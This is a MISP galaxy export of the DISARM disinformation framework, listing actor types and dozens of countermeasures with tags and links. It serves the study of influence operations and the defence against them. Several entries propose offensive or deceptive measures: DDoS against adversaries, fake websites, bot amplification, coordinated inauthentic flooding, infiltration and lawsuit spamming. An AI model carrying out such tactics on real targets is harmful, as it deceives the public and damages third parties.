https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A028.md

server admininistrator

The tag is: misp-galaxy:disarm-actortypes="server admininistrator"

Table 1016. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A029.md

platforms

The tag is: misp-galaxy:disarm-actortypes="platforms"

Table 1017. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A030.md

social media platform adminstrator

Person with the authority to make changes to algorithms, take down content etc.

The tag is: misp-galaxy:disarm-actortypes="social media platform adminstrator"

Table 1018. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A031.md

social media platform outreach

The tag is: misp-galaxy:disarm-actortypes="social media platform outreach"

Table 1019. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A032.md

social media platform owner

Person with authority to make changes to a social media company’s business model

The tag is: misp-galaxy:disarm-actortypes="social media platform owner"

Table 1020. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A033.md

Countermeasures

DISARM is a framework designed for describing and understanding disinformation incidents.

Countermeasures is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

Charge for social media

Include a paid-for privacy option, e.g. pay Facebook for an option of them not collecting your personal information. There are examples of this not working, e.g. most people don’t use proton mail etc.

The tag is: misp-galaxy:disarm-countermeasures="Charge for social media"

Table 1021. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00006.md

Create shared fact-checking database

Share fact-checking resources - tips, responses, countermessages - across response groups.

The tag is: misp-galaxy:disarm-countermeasures="Create shared fact-checking database"

Table 1022. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00008.md

Educate high profile influencers on best practices

Find online influencers. Provide training in the mechanisms of disinformation, how to spot campaigns, and/or how to contribute to responses by countermessaging, boosting information sites etc.

The tag is: misp-galaxy:disarm-countermeasures="Educate high profile influencers on best practices"

Table 1023. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00009.md

Enhanced privacy regulation for social media

Implement stronger privacy standards, to reduce the ability to microtarget community members.

The tag is: misp-galaxy:disarm-countermeasures="Enhanced privacy regulation for social media"

Table 1024. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00010.md

Media literacy. Games to identify fake news

Create and use games to show people the mechanics of disinformation, and how to counter them.

The tag is: misp-galaxy:disarm-countermeasures="Media literacy. Games to identify fake news"

Table 1025. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00011.md

Platform regulation

Empower existing regulators to govern social media. Also covers Destroy. Includes: Include the role of social media in the regulatory framework for media. The U.S. approach will need to be carefully crafted to protect First Amendment principles, create needed transparency, ensure liability, and impose costs for noncompliance. Includes Create policy that makes social media police disinformation. Includes: Use fraud legislation to clean up social media

The tag is: misp-galaxy:disarm-countermeasures="Platform regulation"

Table 1026. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00012.md

Rating framework for news

This is "strategic inoculation", raising the standards of what people expect in terms of evidence when consuming news. Example: journalistic ethics, or journalistic licencing body. Include full transcripts, link source, add items.

The tag is: misp-galaxy:disarm-countermeasures="Rating framework for news"

Table 1027. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00013.md

Real-time updates to fact-checking database

Update fact-checking databases and resources in real time. Especially important for time-limited events like natural disasters.

The tag is: misp-galaxy:disarm-countermeasures="Real-time updates to fact-checking database"

Table 1028. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00014.md

Censorship

Alter and/or block the publication/dissemination of information controlled by disinformation creators. Not recommended.

The tag is: misp-galaxy:disarm-countermeasures="Censorship"

Table 1029. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00016.md

Repair broken social connections

For example, use a media campaign to promote in-group to out-group in-person communication / activities. Technique could be in terms of forcing a reality-check by talking to people instead of reading about bogeymen.

The tag is: misp-galaxy:disarm-countermeasures="Repair broken social connections"

Table 1030. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00017.md

Reduce effect of division-enablers

Includes "Promote constructive communication by shaming division-enablers" and "Promote playbooks to call out division-enablers".

The tag is: misp-galaxy:disarm-countermeasures="Reduce effect of division-enablers"

Table 1031. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00019.md

Encourage in-person communication

Encourage offline communication

The tag is: misp-galaxy:disarm-countermeasures="Encourage in-person communication"

Table 1032. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00021.md

Innoculate. Positive campaign to promote feeling of safety

Used to counter ability based and fear based attacks

The tag is: misp-galaxy:disarm-countermeasures="Innoculate. Positive campaign to promote feeling of safety"

Table 1033. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00022.md

Promote healthy narratives

Includes promoting constructive narratives i.e. not polarising (e.g. pro-life, pro-choice, pro-USA). Includes promoting identity neutral narratives.

The tag is: misp-galaxy:disarm-countermeasures="Promote healthy narratives"

Table 1034. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00024.md

Shore up democracy based messages

Messages about e.g. peace, freedom. And make it sexy. Includes Deploy Information and Narrative-Building in Service of Statecraft: Promote a narrative of transparency, truthfulness, liberal values, and democracy. Implement a compelling narrative via effective mechanisms of communication. Continually reassess messages, mechanisms, and audiences over time. Counteract efforts to manipulate media, undermine free markets, and suppress political freedoms via public diplomacy

The tag is: misp-galaxy:disarm-countermeasures="Shore up democracy based messages"

Table 1035. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00026.md

Create culture of civility

This is passive. Includes promoting civility as an identity that people will defend.

The tag is: misp-galaxy:disarm-countermeasures="Create culture of civility"

Table 1036. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00027.md

Make information provenance available

Blockchain audit log and validation with collaborative decryption to post comments. Use blockchain technology to require collaborative validation before posts or comments are submitted. This could be used to adjust upvote weight via a trust factor of people and organisations you trust, or other criteria.

The tag is: misp-galaxy:disarm-countermeasures="Make information provenance available"

Table 1037. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00028.md

Create fake website to issue counter narrative and counter narrative through physical merchandise

Create websites in disinformation voids - spaces where people are looking for known disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Create fake website to issue counter narrative and counter narrative through physical merchandise"

Table 1038. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00029.md

Develop a compelling counter narrative (truth based)

The tag is: misp-galaxy:disarm-countermeasures="Develop a compelling counter narrative (truth based)"

Table 1039. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00030.md

Dilute the core narrative - create multiple permutations, target / amplify

Create competing narratives. Included "Facilitate State Propaganda" as diluting the narrative could have an effect on the pro-state narrative used by volunteers, or lower their involvement.

The tag is: misp-galaxy:disarm-countermeasures="Dilute the core narrative - create multiple permutations, target / amplify"

Table 1040. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00031.md

Link to platform

The tag is: misp-galaxy:disarm-countermeasures="Hijack content and link to truth- based info"

Table 1041. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00032.md

Create more friction at account creation

Counters fake account

The tag is: misp-galaxy:disarm-countermeasures="Create more friction at account creation"

Table 1042. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00034.md

Infiltrate the in-group to discredit leaders (divide)

All of these would be highly affected by infiltration or false-claims of infiltration.

The tag is: misp-galaxy:disarm-countermeasures="Infiltrate the in-group to discredit leaders (divide)"

Table 1043. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00036.md

third party verification for people

counters fake experts

The tag is: misp-galaxy:disarm-countermeasures="third party verification for people"

Table 1044. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00040.md

Address truth contained in narratives

Focus on and boost truths in misinformation narratives, removing misinformation from them.

The tag is: misp-galaxy:disarm-countermeasures="Address truth contained in narratives"

Table 1045. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00042.md

Keep people from posting to social media immediately

Platforms can introduce friction to slow down activities, force a small delay between posts, or replies to posts.

The tag is: misp-galaxy:disarm-countermeasures="Keep people from posting to social media immediately"

Table 1046. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00044.md

Marginalise and discredit extremist groups

Reduce the credibility of extremist groups posting misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Marginalise and discredit extremist groups"

Table 1047. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00046.md

Honeypot with coordinated inauthentics

Flood disinformation spaces with obviously fake content, to dilute core misinformation narratives in them.

The tag is: misp-galaxy:disarm-countermeasures="Honeypot with coordinated inauthentics"

Table 1048. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00047.md

Name and Shame Influencers

Think about the different levels: individual vs state-sponsored account. Includes “call them out” and “name and shame”. Identify social media accounts as sources of propaganda—“calling them out”— might be helpful to prevent the spread of their message to audiences that otherwise would consider them factual. Identify, monitor, and, if necessary, target externally-based nonattributed social media accounts. Impact of and Dealing with Trolls - "Chatham House has observed that trolls also sometimes function as decoys, as a way of “keeping the infantry busy” that “aims to wear down the other side” (Lough et al., 2014). Another type of troll involves “false accounts posing as authoritative information sources on social media”.

The tag is: misp-galaxy:disarm-countermeasures="Name and Shame Influencers"

Table 1049. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00048.md

Counter social engineering training

Includes anti-elicitation training, phishing prevention education.

The tag is: misp-galaxy:disarm-countermeasures="Counter social engineering training"

Table 1050. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00051.md

Infiltrate platforms

Detect and degrade

The tag is: misp-galaxy:disarm-countermeasures="Infiltrate platforms"

Table 1051. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00052.md

Delete old accounts / Remove unused social media accounts

Remove, or remove access to (e.g. stop the ability to update), old social media accounts, to reduce the pool of accounts available for takeover, botnets etc.

The tag is: misp-galaxy:disarm-countermeasures="Delete old accounts / Remove unused social media accounts"

Table 1052. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00053.md

Encourage people to leave social media

Encourage people to leave social media. We don’t expect this to work.

The tag is: misp-galaxy:disarm-countermeasures="Encourage people to leave social media"

Table 1053. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00056.md

Report crowdfunder as violator

Counters crowdfunding. Includes "Expose online funding as fake".

The tag is: misp-galaxy:disarm-countermeasures="Report crowdfunder as violator"

Table 1054. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00058.md

Verification of project before posting fund requests

Third-party verification of projects posting funding campaigns before those campaigns can be posted.

The tag is: misp-galaxy:disarm-countermeasures="Verification of project before posting fund requests"

Table 1055. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00059.md

Take legal action against for-profit "factories" creating misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Legal action against for-profit engagement factories"

Table 1056. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00060.md

Free open library sources worldwide

Open-source libraries could be created that aid in some way for each technique. Even for Strategic Planning, some open-source frameworks such as DISARM can be created to counter the adversarial efforts.

The tag is: misp-galaxy:disarm-countermeasures="Free open library sources worldwide"

Table 1057. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00062.md

Reduce political targeting

Includes “ban political micro targeting” and “ban political ads”

The tag is: misp-galaxy:disarm-countermeasures="Reduce political targeting"

Table 1058. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00065.md

Co-opt a hashtag and drown it out (hijack it back)

Flood a disinformation-related hashtag with other content.

The tag is: misp-galaxy:disarm-countermeasures="Co-opt a hashtag and drown it out (hijack it back)"

Table 1059. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00066.md

Denigrate the recipient/ project (of online funding)

Reduce the credibility of groups behind misinformation-linked funding campaigns.

The tag is: misp-galaxy:disarm-countermeasures="Denigrate the recipient/ project (of online funding)"

Table 1060. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00067.md

Block access to disinformation resources

Resources = accounts, channels etc. Block access to platform. DDOS an attacker. TA02*: DDOS at the critical time, to deny an adversary’s time-bound objective. T0008: A quick response to a proto-viral story will affect its ability to spread and raise questions about their legitimacy. Hashtag: Against the platform, by drowning the hashtag. T0046 - Search Engine Optimisation: Sub-optimal website performance affects its search engine rank, which I interpret as "blocking access to a platform".

The tag is: misp-galaxy:disarm-countermeasures="Block access to disinformation resources"

Table 1061. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00070.md

Block source of pollution

Block websites, accounts, groups etc. connected to misinformation and other information pollution.

The tag is: misp-galaxy:disarm-countermeasures="Block source of pollution"

Table 1062. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00071.md

Check special-interest groups (e.g. medical, knitting) for unrelated and misinformation-linked content, and remove it.

The tag is: misp-galaxy:disarm-countermeasures="Remove non-relevant content from special interest groups - not recommended"

Table 1063. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00072.md

Inoculate populations through media literacy training

Use training to build the resilience of at-risk populations. Educate on how to handle info pollution. Push out targeted education on why it’s pollution. Build cultural resistance to false content, e.g. cultural resistance to bullshit. Influence literacy training, to inoculate against “cult” recruiting. Media literacy training: leverage librarians / library for media literacy training. Inoculate at language. Strategic planning included as inoculating population has strategic value. Concepts of media literacy to a mass audience that authorities launch a public information campaign that teaches the programme will take time to develop and establish impact, recommends curriculum-based training. Covers detect, deny, and degrade.

The tag is: misp-galaxy:disarm-countermeasures="Inoculate populations through media literacy training"

Table 1064. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00073.md

Identify and delete or rate limit identical content

C00000

The tag is: misp-galaxy:disarm-countermeasures="Identify and delete or rate limit identical content"

Table 1065. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00074.md

normalise language

Normalise the language around disinformation and misinformation; give people the words for artefact and effect types.

The tag is: misp-galaxy:disarm-countermeasures="normalise language"

Table 1066. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00075.md

Prohibit images in political discourse channels

Make political discussion channels text-only.

The tag is: misp-galaxy:disarm-countermeasures="Prohibit images in political discourse channels"

Table 1067. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00076.md

Develop networks of communities and influencers around counter-misinformation. Match them to misinformation creators

The tag is: misp-galaxy:disarm-countermeasures="Active defence: run TA15 "develop people” - not recommended"

Table 1068. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00077.md

Change Search Algorithms for Disinformation Content

Includes “change image search algorithms for hate groups and extremists” and “Change search algorithms for hate and extremist queries to show content sympathetic to opposite side”

The tag is: misp-galaxy:disarm-countermeasures="Change Search Algorithms for Disinformation Content"

Table 1069. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00078.md

Create competing narrative

Create counternarratives, or narratives that compete in the same spaces as misinformation narratives. Could also be degrade.

The tag is: misp-galaxy:disarm-countermeasures="Create competing narrative"

Table 1070. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00080.md

Highlight flooding and noise, and explain motivations

Discredit by pointing out the "noise" and informing the public that "flooding" is a technique of disinformation campaigns; point out the intended objective of the "noise".

The tag is: misp-galaxy:disarm-countermeasures="Highlight flooding and noise, and explain motivations"

Table 1071. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00081.md

Ground truthing as automated response to pollution

Also inoculation.

The tag is: misp-galaxy:disarm-countermeasures="Ground truthing as automated response to pollution"

Table 1072. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00082.md

Modify disinformation narratives, and rebroadcast them

Includes “poison pill recasting of message” and “steal their truths”. Many techniques involve promotion which could be manipulated. For example, online fundings or rallies could be advertised, through compromised or fake channels, as being associated with "far-up/down/left/right" actors. "Long Game" narratives could be subjected in a similar way with negative connotations. Can also replay technique T0003.

The tag is: misp-galaxy:disarm-countermeasures="Modify disinformation narratives, and rebroadcast them"

Table 1073. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00084.md

Mute content

Rate-limit disinformation content. Reduces its effects, whilst not running afoul of censorship concerns. Online archives of content (archives of websites, social media profiles, media, copies of published advertisements; or archives of comments attributed to bad actors, as well as anonymized metadata about users who interacted with them and analysis of the effect) are useful for intelligence analysis and public transparency, but will need similar muting or tagging/shaming as associated with bad actors.

The tag is: misp-galaxy:disarm-countermeasures="Mute content"

Table 1074. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00085.md

Distract from noise with addictive content

Example: Interject addictive links or contents into discussions of disinformation materials and measure a "conversion rate" of users who engage with your content and away from the social media channel’s "information bubble" around the disinformation item. Use bots to amplify and upvote the addictive content.

The tag is: misp-galaxy:disarm-countermeasures="Distract from noise with addictive content"

Table 1075. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00086.md

Make more noise than the disinformation

The tag is: misp-galaxy:disarm-countermeasures="Make more noise than the disinformation"

Table 1076. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00087.md

Fake engagement system

Create honeypots for misinformation creators to engage with, and reduce the resources they have available for misinformation campaigns.

The tag is: misp-galaxy:disarm-countermeasures="Fake engagement system"

Table 1077. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00090.md

Honeypot social community

Set honeypots, e.g. communities, in networks likely to be used for disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Honeypot social community"

Table 1078. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00091.md

Establish a truth teller reputation score for influencers

Includes "Establish a truth teller reputation score for influencers” and “Reputation scores for social media users”. Influencers are individuals or accounts with many followers.

The tag is: misp-galaxy:disarm-countermeasures="Establish a truth teller reputation score for influencers"

Table 1079. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00092.md

Influencer code of conduct

Establish tailored code of conduct for individuals with many followers. Can be platform code of conduct; can also be community code.

The tag is: misp-galaxy:disarm-countermeasures="Influencer code of conduct"

Table 1080. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00093.md

Force full disclosure on corporate sponsor of research

Accountability move: make sure research is published with its funding sources.

The tag is: misp-galaxy:disarm-countermeasures="Force full disclosure on corporate sponsor of research"

Table 1081. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00094.md

Strengthen institutions that are always truth tellers

Increase credibility, visibility, and reach of positive influencers in the information space.

The tag is: misp-galaxy:disarm-countermeasures="Strengthen institutions that are always truth tellers"

Table 1082. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00096.md

Require use of verified identities to contribute to poll or comment

Reduce poll flooding by only taking comments or poll entries from verified accounts.

The tag is: misp-galaxy:disarm-countermeasures="Require use of verified identities to contribute to poll or comment"

Table 1083. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00097.md

Revocation of allowlisted or "verified" status

Remove blue checkmarks etc. from known misinformation accounts.

The tag is: misp-galaxy:disarm-countermeasures="Revocation of allowlisted or "verified" status"

Table 1084. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00098.md

Strengthen verification methods

Improve content verification methods available to groups, individuals etc.

The tag is: misp-galaxy:disarm-countermeasures="Strengthen verification methods"

Table 1085. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00099.md

Hashtag jacking

Post large volumes of unrelated content on known misinformation hashtags.

The tag is: misp-galaxy:disarm-countermeasures="Hashtag jacking"

Table 1086. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00100.md

Create friction by rate-limiting engagement

Create participant friction. Includes "Make repeat voting hard" and "Throttle number of forwards".

The tag is: misp-galaxy:disarm-countermeasures="Create friction by rate-limiting engagement"

Table 1087. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00101.md

Create a bot that engages / distract trolls

This is a reactive, not an active, measure (honeypots are active). It’s a platform-controlled measure.

The tag is: misp-galaxy:disarm-countermeasures="Create a bot that engages / distract trolls"

Table 1088. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00103.md

Buy more advertising than misinformation creators

Shift influence and algorithms by posting more adverts into spaces than misinformation creators.

The tag is: misp-galaxy:disarm-countermeasures="Buy more advertising than misinformation creators"

Table 1089. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00105.md

Click-bait centrist content

Create emotive centrist content that gets more clicks.

The tag is: misp-galaxy:disarm-countermeasures="Click-bait centrist content"

Table 1090. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00106.md

Content moderation

Includes social media content take-downs, e.g. Facebook or Twitter content take-downs.

The tag is: misp-galaxy:disarm-countermeasures="Content moderation"

Table 1091. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00107.md

Dampen Emotional Reaction

Reduce emotional responses to misinformation through calming messages, etc.

The tag is: misp-galaxy:disarm-countermeasures="Dampen Emotional Reaction"

Table 1092. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00109.md

Reduce polarisation by connecting and presenting sympathetic renditions of opposite views

The tag is: misp-galaxy:disarm-countermeasures="Reduce polarisation by connecting and presenting sympathetic renditions of opposite views"

Table 1093. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00111.md

"Prove they are not an op!"

Challenge misinformation creators to prove they’re not an information operation.

The tag is: misp-galaxy:disarm-countermeasures=""Prove they are not an op!""

Table 1094. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00112.md

Debunk and defuse a fake expert / credentials.

Debunk fake experts, their credentials, and potentially also their audience quality.

The tag is: misp-galaxy:disarm-countermeasures="Debunk and defuse a fake expert / credentials."

Table 1095. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00113.md

Don’t engage with payloads

Stop passing on misinformation

The tag is: misp-galaxy:disarm-countermeasures="Don’t engage with payloads"

Table 1096. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00114.md

Expose actor and intentions

Debunk misinformation creators and posters.

The tag is: misp-galaxy:disarm-countermeasures="Expose actor and intentions"

Table 1097. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00115.md

Provide proof of involvement

Build and post information about groups etc’s involvement in misinformation incidents.

The tag is: misp-galaxy:disarm-countermeasures="Provide proof of involvement"

Table 1098. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00116.md

Downgrade / de-amplify so message is seen by fewer people

Label promote counter to disinformation

The tag is: misp-galaxy:disarm-countermeasures="Downgrade / de-amplify so message is seen by fewer people"

Table 1099. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00117.md

Repurpose images with new text

Add countermessage text to images used in misinformation incidents.

The tag is: misp-galaxy:disarm-countermeasures="Repurpose images with new text"

Table 1100. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00118.md

Engage payload and debunk.

Debunk misinformation content. Provide a link to the facts.

The tag is: misp-galaxy:disarm-countermeasures="Engage payload and debunk."

Table 1101. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00119.md

Open dialogue about design of platforms to produce different outcomes

Redesign platforms and algorithms to reduce the effectiveness of disinformation

The tag is: misp-galaxy:disarm-countermeasures="Open dialogue about design of platforms to produce different outcomes"

Table 1102. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00120.md

Tool transparency and literacy for channels people follow.

Make algorithms in platforms explainable, and visible to people using those platforms.

The tag is: misp-galaxy:disarm-countermeasures="Tool transparency and literacy for channels people follow."

Table 1103. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00121.md

Remove or rate limit botnets

Reduce the visibility of known botnets online.

The tag is: misp-galaxy:disarm-countermeasures="Remove or rate limit botnets"

Table 1104. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00123.md

Don’t feed the trolls

Don’t engage with individuals relaying misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Don’t feed the trolls"

Table 1105. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00124.md

Prebunking

Produce material in advance of misinformation incidents, by anticipating the narratives used in them, and debunking them.

The tag is: misp-galaxy:disarm-countermeasures="Prebunking"

Table 1106. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00125.md

Social media amber alert

Create an alert system around disinformation and misinformation artefacts, narratives, and incidents

The tag is: misp-galaxy:disarm-countermeasures="Social media amber alert"

Table 1107. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00126.md

Create friction by marking content with ridicule or other "decelerants"

Repost or comment on misinformation artefacts, using ridicule or other content to reduce the likelihood of reposting.

The tag is: misp-galaxy:disarm-countermeasures="Create friction by marking content with ridicule or other "decelerants""

Table 1108. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00128.md

Use banking to cut off access

Fiscal sanctions; a parallel to counter-terrorism.

The tag is: misp-galaxy:disarm-countermeasures="Use banking to cut off access"

Table 1109. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00129.md

Mentorship: elders, youth, credit. Learn vicariously.

Train local influencers in countering misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Mentorship: elders, youth, credit. Learn vicariously."

Table 1110. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00130.md

Seize and analyse botnet servers

Take botnet servers offline by seizing them.

The tag is: misp-galaxy:disarm-countermeasures="Seize and analyse botnet servers"

Table 1111. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00131.md

Deplatform Account*

Note: Similar to Deplatform People but less generic. Perhaps both should be left.

The tag is: misp-galaxy:disarm-countermeasures="Deplatform Account*"

Table 1112. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00133.md

Deplatform message groups and/or message boards

Merged two rows here.

The tag is: misp-galaxy:disarm-countermeasures="Deplatform message groups and/or message boards"

Table 1113. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00135.md

Microtarget most likely targets then send them countermessages

Find communities likely to be targeted by misinformation campaigns, and send them countermessages or pointers to information sources.

The tag is: misp-galaxy:disarm-countermeasures="Microtarget most likely targets then send them countermessages"

Table 1114. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00136.md

Spam domestic actors with lawsuits

File multiple lawsuits against known misinformation creators and posters, to distract them from disinformation creation.

The tag is: misp-galaxy:disarm-countermeasures="Spam domestic actors with lawsuits"

Table 1115. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00138.md

Weaponise youtube content matrices

God knows what this is. Keeping temporarily in case we work it out.

The tag is: misp-galaxy:disarm-countermeasures="Weaponise youtube content matrices"

Table 1116. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00139.md

"Bomb" link shorteners with lots of calls

Applies to most of the content used by exposure techniques except "T0055 - Use hashtag". Applies to analytics.

The tag is: misp-galaxy:disarm-countermeasures=""Bomb" link shorteners with lots of calls"

Table 1117. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00140.md

Platform adds warning label and decision point when sharing content

